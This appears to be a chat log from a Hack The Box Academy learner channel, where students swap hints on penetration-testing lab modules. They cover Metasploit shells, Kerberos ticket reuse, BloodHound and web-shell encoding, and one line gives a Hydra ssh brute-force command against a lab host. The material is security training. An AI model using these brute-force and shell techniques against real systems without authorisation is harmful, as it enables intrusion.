free from school 🤷🏻‍♂️

if you stay here a good while you could enjoy this like every other days and it's was worse before

it happens a lot in Academy since it's a public channel

i see

at least we had a good time

everyone missed this through the lol but you are on Server-side Attacks Skills Assessment right? hint stop using tplmap or any automatic tool (as the other dump dump learn) and enum the page source code manually

it made me laugh the xor aes part

ohh this was a good one! keep trying

love when academy questions have a little think outside of the box

just use metasploit tbh that's what i've learned today

metasploit can do anything

Or Burpsuite

the without registering an account is a huge hint @fossil parrot

well expect someone will open to me and tell me the way how to bypass av, but i will find some way soon probably

keep using metasploit and you'll get there kiddo

i believe in you

probably nope for both

dont talk to me xd

nvm thanks for support guys

see u

you've said bye like five times now... is this time for real?

Bye 👋

yes

"Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with? "

Once we find the exploit, will we need to use the exploit to find the user name in the system once we are in the system or is the username something we already need to know through other means?

use the exploit and then run whoami, who are you?

(assuming it was successful)

if you're already on the system, have RCE, or LFI, then yes you could probably cheat and figure it out, but that's not the point of the module/section

whoami is not working on this ubuntu system

i ran sharhound in powershell now im trying to import the file into bloodhound but i get an error "bad json file" anyone know why

do you have other hint?

try to finish the assessments without hints

otherwise you are just wasting your time xd

nvm got it

you're in meterpreter, type ? you'll see there is no whoami command which it is telling you.. || run a command to get a shell ||

that assessments is super easy just a bit out of the box and the hint i give before is the best thing that you'll need

enter the command shell

either use shell to drop into a cmd or bash shell or use getuid

without registering

and try again

Because you have to drop into the shell

For PtTf from Linux under Password attacks: Is /tmp/krb5cc_647401106_HRJDux not correct to use? Exercise: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. I have tried everything from limikatz the ls -la /tmp, klist, etc.. and this is the only one for julio that doesnt look expired. cp --> export, not working for me.

There's another one

https://tenor.com/view/yoda-there-is-another-star-wars-jedi-gif-5140031

Both suggestions worked

I see two for J, but that one is expired. I'll keep pushing. I'm sure it's staring at me right in the face. Thank you!

you show up a bit late 🤣 you missed the whole show, some guy was trying to hack servers with xor encrypted social engineering

HAHAHAHAHA

Eh I'm busy today hanging out with a friend

w8 do you have life apart from hacking

never heard of that

Un poquito

https://tenor.com/view/you-guys-got-pants-gif-21509874

nah she is speaking spanish now

Found the ticket. Weird that it showed up later after using some of the same commands. Now just need to figure out how to traverse as that not working either lol. bastages

Some of the tickets are expired

that means un poquito in spanish

I need some help with the Windows Privilege Escalation Skill Assessment 1.
I have a full tty shel on the target and I am trying to upload a file to the box, but herein lies my problem(s) I do not know where I can Download a file to, and I cant find anywhere.

hey bro currently into the password attacking module medium lab got ssh access and looking around found a local mysql and a debian_create_root_user.sql
am i on the right track? sry for asking

The create user sql is not necessary

Just enumerate with creds you have

yea, i knew they expired, just feel like i was seeing the same ones over and over, now i see what is happening. I got the flag. Thanks for the push. Appreciate it.

ty got in ❤️

Anyone?

found the other creds now its time to dig into Ds ssh

Got it sorted, could not use curl or wget to download the file

help with Login Brute forcing module...https://academy.hackthebox.com/module/57/section/491

hydra -l b.gates -P '\william.txt' -u -f ssh://83.136.253.147:53372 -t 4

doesn't give any hits

what password list are we supposed to use?

the cupp generated

that's what I used

I gave first last and nickname

just follow step by step from previous section

also use the sed commands

you need everything that's shown in the module, not just whatever you feel like giving

they literally give you the exercise done

Module: Active Directory, Section: Credentialed Enum, trying connect to the box, but there is black screen and it is not working, could anyone help please?

Have you tried hitting any key

yeah, its not working

Enter?

oh it worked, thank you

Almost like this question has been asked

1000 times

oh sorry i didnt know haha

the good screensaver

it got me too the first time, I switched to Remmina, then saw the answer here the next day lol

Screensaver the best AV/Defender

yeah, gotta put that in my recommendations, black hats gonna be like "guess those creds don't work, we've been thwarted, guys"

ok

hello everyone, I would like to ask for help, I am 17 years old, I would like to study for a base in the field of cybersecurity to learn how to solve CTF tasks, who can give advice or resources to study

thank you in advance

I don't understand why this command isn't working in msfconsole. I tried fixing the issues with the suggestions that were I asked what to do when the 'db_nmap' command doesn't work and none of the suggestions I tried worked: db_nmap -sV -p- -T5 -A 10.129.239.61

https://academy.hackthebox.com/

Tryhackme is also a good place to start learn hacking. I use both tryhackme, academy.hackthebox.com and the hackthebox labs\

have you looked into the error and what it means and how to resolve it?

THM is an awful place to learn, stay on HTB Academy

I won't say awful , but these days I am finding HTB Academy to be the better learning resource because I think its more practical

if it's not practical it's an awful resource

you most likely won't succeed when doing boxes or when first starting on HTB Academy, but you will be challenged and learn.
you will not learn on THM it's awful

but THM definitely has some practical rooms for sure

if you want to waste your time be my guest.
i've tried both platforms and i've been challenged and learned far more here than they ever taught me

same

How can I do proper encoding on bigger terminal commands to run them on my web shells? Basically converting commands into url format?

base64 encode?

Isn't that just encryption? For example I saw Ippsec doing ctrl + U on burp suite to convert his reverse shell into url format

https://youtu.be/s_0GcRGv6Ds?t=24m2s

This is what I'm talking about

@0х Sir, I made a little progress on yesterday's task with the footprinting lab 2.

I think ./urlencode might be what I'm looking for lmao

Encryption and encoding are two completely different things